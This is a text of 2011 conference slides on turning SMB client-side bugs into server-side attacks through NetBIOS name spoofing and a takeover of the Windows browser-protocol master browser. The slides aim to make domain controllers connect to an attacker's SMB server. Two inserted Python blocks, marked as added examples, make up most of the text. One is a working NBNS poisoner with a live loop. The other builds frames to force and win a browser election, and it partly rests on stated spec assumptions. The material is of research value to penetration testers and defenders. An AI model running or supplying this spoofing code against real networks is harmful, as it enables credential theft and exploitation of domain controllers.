NCC Group Plc, Manchester Technology Centre, Oxford Road, Manchester M1 7EF www.nccgroup.com
NGS Secure
Laurent Gaffié, Senior Security Consultant
e-mail: [email protected]
Turning SMB Client-Side Bugs To Server Side
Ruxcon monthly, 25/03/2011
Who am I ?
- Laurent Gaffié
- Senior Security Consultant at NGS Secure
- Plenty of SMB research
- Network / web app pentesting monkey
Agenda
- Turning What ? SMB Protocol, Browser Protocol, NetBIOS Name Service
- Why Turning ? SMB client-side bugs
- How to Turn ? NetBIOS Name Spoofing, Browser Protocol
- Demo ! Conclusion & Questions
Turning What ?
SMB Protocol
- Can be used over TCP/IP (directly on 445, or via NetBIOS on 139), IPX/SPX and NetBEUI
- A protocol for file sharing, printers and serial ports
- A transport layer for DCE/RPC (named pipes over IPC$)
- Runs as a kernel driver on Windows (srv.sys on the server side, mrxsmb.sys on the client side), so a bug on either side is a kernel bug
Turning What ?
Browser Protocol (CIFS Browser, carried in \MAILSLOT\BROWSE datagrams over UDP/138)
- Host Announcement
- Request Announcement
- Election
- Local Master Browser (LMB)
- Domain Master Browser (DMB, the PDC in an NT domain)
- Master Announcement
Turning What ?
NetBIOS Name Service (NBNS)
- Name Query Service: resolves any NetBIOS name (domain, UNC host name) of up to 15 characters plus a 1-byte suffix, by UDP/137 broadcast
- No check at all: queries are unauthenticated and the client takes the first positive answer, so a spoofed response is trivial and leads to MITM
- Name Overwrite Demand: can overwrite a NBT name registration on the subnet!
Why Turning ?
SMB client-side bugs
- Lots of them!
- Easier to find than server-side bugs
- Don't require auth: the client will talk to whatever answers the name lookup
- Kernel bugs (mrxsmb.sys), not user-land crashes
- Can be triggered automatically, with no user interaction, once you can make the target connect to you
How to Turn ?
NetBIOS Name Spoofing
- Wait for someone to resolve the name of a corporate share (\\FILESRV\share): the lookup goes out as an NBNS broadcast query
- Spoof the NBNS answer, pointing the name at your IP
- The target, even if it is a server, now connects to your fake SMB server as a client
- Grab credentials (NTLM challenge/response), exploit an SMB client-side security issue, escalate privileges on the target RPC application, etc.
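The NBNS exchange above at packet level, as an added example (not code from the talk, and not Laurent Gaffié's Responder): a parser for the broadcast NAME QUERY REQUEST a Windows client sends when resolving \\NAME\share, the RFC 1002 first-level name encoding it needs, and the builder for the positive NAME QUERY RESPONSE that points the name at the attacker's IP. The `targets` allow-list, the decision to answer only <20> (file server) lookups, and the sample names and IPs are my own choices, not anything the slides prescribe.

```python
"""NBNS name-query spoofing, packet level (RFC 1001/1002 formats). Added example."""
import socket
import struct

NBNS_PORT = 137
QTYPE_NB = 0x0020                  # NetBIOS general name service record
QCLASS_IN = 0x0001
FLAGS_BROADCAST_QUERY = 0x0110     # query, opcode QUERY, broadcast (B) + recursion desired (RD)
FLAGS_POSITIVE_RESPONSE = 0x8500   # response, opcode QUERY, authoritative (AA) + RD
SUFFIX_FILE_SERVER = 0x20          # <20> suffix: what a \\SERVER\share lookup asks for


def encode_nb_name(name, suffix=SUFFIX_FILE_SERVER):
    """First-level encoding: pad to 15 chars, append the suffix byte, then split
    every byte into two nibbles and add each to 'A' (0x41)."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = bytearray()
    for b in raw:
        enc.append(0x41 + (b >> 4))
        enc.append(0x41 + (b & 0x0F))
    return bytes([32]) + bytes(enc) + b"\x00"   # label length, 32 chars, empty scope


def decode_nb_name(data, offset=0):
    """Inverse of encode_nb_name; returns (name, suffix, offset just past the name)."""
    if data[offset] != 32:
        raise ValueError("a NetBIOS name is always one 32-character label")
    enc = data[offset + 1:offset + 33]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    pos = offset + 33
    while data[pos] != 0:            # skip scope-ID labels, if the sender uses a scope
        pos += 1 + data[pos]
    return raw[:15].decode("ascii").rstrip(" "), raw[15], pos + 1


def parse_query(pkt):
    """Parse a NAME QUERY REQUEST; returns None for anything that is not one."""
    if len(pkt) < 12:
        return None
    trn_id, flags, qdcount, _, _, _ = struct.unpack(">6H", pkt[:12])
    is_response = flags & 0x8000
    opcode = (flags >> 11) & 0xF      # 0 = QUERY (registration, release etc. are ignored)
    if is_response or opcode != 0 or qdcount != 1:
        return None
    name, suffix, pos = decode_nb_name(pkt, 12)
    qtype, qclass = struct.unpack(">HH", pkt[pos:pos + 4])
    if qtype != QTYPE_NB or qclass != QCLASS_IN:
        return None
    return {"trn_id": trn_id, "name": name, "suffix": suffix}


def build_query(name, suffix=SUFFIX_FILE_SERVER, trn_id=0x1234):
    """The broadcast a client sends for \\\\NAME\\share (used here as constructed input)."""
    hdr = struct.pack(">6H", trn_id, FLAGS_BROADCAST_QUERY, 1, 0, 0, 0)
    return hdr + encode_nb_name(name, suffix) + struct.pack(">HH", QTYPE_NB, QCLASS_IN)


def build_positive_response(query, spoof_ip, ttl=165):
    """POSITIVE NAME QUERY RESPONSE: same TRN_ID, one answer RR mapping the name to spoof_ip."""
    hdr = struct.pack(">6H", query["trn_id"], FLAGS_POSITIVE_RESPONSE, 0, 1, 0, 0)
    rr = encode_nb_name(query["name"], query["suffix"])
    rr += struct.pack(">HHIH", QTYPE_NB, QCLASS_IN, ttl, 6)        # type, class, TTL, RDLENGTH
    rr += struct.pack(">H", 0x0000) + socket.inet_aton(spoof_ip)  # NB_FLAGS: unique, B-node; NB_ADDRESS
    return hdr + rr


def spoof_answer(pkt, spoof_ip, targets=None):
    """Answer only file-server lookups, optionally only for the names in `targets`
    (a hypothetical allow-list so we do not poison every lookup on the subnet)."""
    q = parse_query(pkt)
    if q is None or q["suffix"] != SUFFIX_FILE_SERVER:
        return None
    if targets is not None and q["name"] not in targets:
        return None
    return build_positive_response(q, spoof_ip)


if __name__ == "__main__":
    # Sketch of the live loop: needs root, and port 137 must not be held by nmbd/Windows.
    import sys
    my_ip = sys.argv[1]
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", NBNS_PORT))
    while True:
        pkt, (src, sport) = sock.recvfrom(1024)
        answer = spoof_answer(pkt, my_ip)
        if answer:
            sock.sendto(answer, (src, sport))
            print("poisoned %s for %s -> %s" % (parse_query(pkt)["name"], src, my_ip))
```

The victim then opens an SMB session to `spoof_ip`; whatever listens there (a credential-capturing SMB server or a client-side exploit) sees the victim as a client, which is the whole point of the slide.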
How to Turn ?
Browser Protocol
- Send two Reset Browser State Announcements to the LMB: the first with the flag set to 0x02 (flush the browse lists and restart), the second with the flag set to 0x01 (demote the LMB to a Backup Browser)
- Win the election you have just launched: the winner is picked from the values carried in the election frame (version, criteria, uptime, name), and you control the values you send
- Become the LMB
How to Turn ?
Browser Protocol
- Let the PDC know that you are now an LMB by sending it a Master Announcement
- The PDC (the Domain Master Browser) will then connect to your fake SMB server to fetch your browse list
- Every 15 minutes, each Backup Browser also makes an SMB connection to the LMB to sync its list
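The mailslot payloads for the LMB takeover described in the two Browser Protocol slides, as an added example that is not from the talk: the two ResetBrowserState frames, a RequestElection frame built to outrank a normal Windows LMB, the comparison rule that decides the election, and the MasterAnnouncement sent to the PDC. The frame layouts (opcode, version, criteria, uptime, unused, name) follow MS-BRWS; the byte layout of the Criteria word and the OSType/role bit values are my reading of that spec and are marked as assumptions in the code. The code builds the browser payloads only; wrapping them in the \MAILSLOT\BROWSE SMB transaction and the NetBIOS datagram (UDP/138) is not shown.

```python
"""Browser-protocol (MS-BRWS) mailslot payloads for the LMB takeover. Added example."""
import struct

OP_REQUEST_ELECTION = 0x08
OP_MASTER_ANNOUNCEMENT = 0x0D
OP_RESET_BROWSER_STATE = 0x0E

RESET_STOP_MASTER = 0x01   # demote the LMB to a backup browser      (slide: flag 01)
RESET_CLEAR_ALL = 0x02     # flush the browse lists and start again   (slide: flag 02)

# Election criteria pieces. Layout and values are assumptions based on MS-BRWS 2.2.3:
# OSType in the high byte, browser version (1.15) in the middle, role bits in the low byte.
BROWSER_VERSION_MAJOR, BROWSER_VERSION_MINOR = 0x01, 0x0F
OS_NT_WORKSTATION, OS_NT_SERVER = 0x10, 0x20
ROLE_PDC, ROLE_PREFERRED_MASTER = 0x80, 0x08


def reset_browser_state(options):
    """ResetBrowserState: opcode 0x0E followed by the one-byte options field."""
    return struct.pack("<BB", OP_RESET_BROWSER_STATE, options)


def election_criteria(os_type, role_bits,
                      major=BROWSER_VERSION_MAJOR, minor=BROWSER_VERSION_MINOR):
    """32-bit Criteria word; a higher value wins (assumed byte layout, see above)."""
    return (os_type << 24) | (major << 16) | (minor << 8) | role_bits


def nb_name(server_name):
    """Null-terminated NetBIOS server name, at most 15 characters."""
    return server_name.upper().encode("ascii")[:15] + b"\x00"


def request_election(criteria, uptime_ms, server_name, version=1):
    """RequestElection: opcode, version, criteria, uptime (ms), 4 unused bytes, name."""
    return struct.pack("<BBIII", OP_REQUEST_ELECTION, version, criteria, uptime_ms, 0) \
        + nb_name(server_name)


def parse_election(frame):
    """Decode a RequestElection frame into the fields the election compares."""
    op, version, criteria, uptime_ms, _unused = struct.unpack_from("<BBIII", frame, 0)
    if op != OP_REQUEST_ELECTION:
        raise ValueError("not a RequestElection frame")
    name = frame[14:].split(b"\x00", 1)[0].decode("ascii")
    return {"version": version, "criteria": criteria, "uptime_ms": uptime_ms, "name": name}


def beats(mine, theirs):
    """True when `mine` wins over `theirs`: version, then criteria, then uptime,
    each higher-wins. MS-BRWS breaks a full tie on the server name; that last
    step is not modelled here, so a full tie returns False."""
    return ((mine["version"], mine["criteria"], mine["uptime_ms"])
            > (theirs["version"], theirs["criteria"], theirs["uptime_ms"]))


def master_announcement(server_name):
    """MasterAnnouncement: opcode 0x0D plus the new LMB's name, unicast to the PDC."""
    return struct.pack("<B", OP_MASTER_ANNOUNCEMENT) + nb_name(server_name)


def takeover_sequence(server_name):
    """The payloads in the order the slides send them. Returns (frames for the
    LMB / broadcast, frame for the PDC). The attacker claims NT Server, PDC and
    preferred-master bits, and the maximum possible uptime, so any real LMB loses."""
    criteria = election_criteria(OS_NT_SERVER, ROLE_PDC | ROLE_PREFERRED_MASTER)
    to_lmb = [
        reset_browser_state(RESET_CLEAR_ALL),
        reset_browser_state(RESET_STOP_MASTER),
        request_election(criteria, 0xFFFFFFFF, server_name),
    ]
    return to_lmb, master_announcement(server_name)


if __name__ == "__main__":
    frames, announce = takeover_sequence("EVILBOX")
    for f in frames:
        print(f.hex())
    print(announce.hex())
```

Because every field the election compares is attacker-supplied, the only defence on the wire is to not run the browser service (or the NetBIOS layer) at all; there is nothing in the protocol for the PDC to check.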
Demo !
Conclusion & Questions
Conclusion
- Because of how the protocol works, an SMB client-side bug is as dangerous as a server-side one on a corporate network: any host, the PDC included, can be made to act as an SMB client
- Exploiting SMB client-side bugs on the PDC with no user interaction is a big payoff in a pentest
- Since this attack specifically targets the PDC, a reliable client-side exploit is easily wormable
Questions ?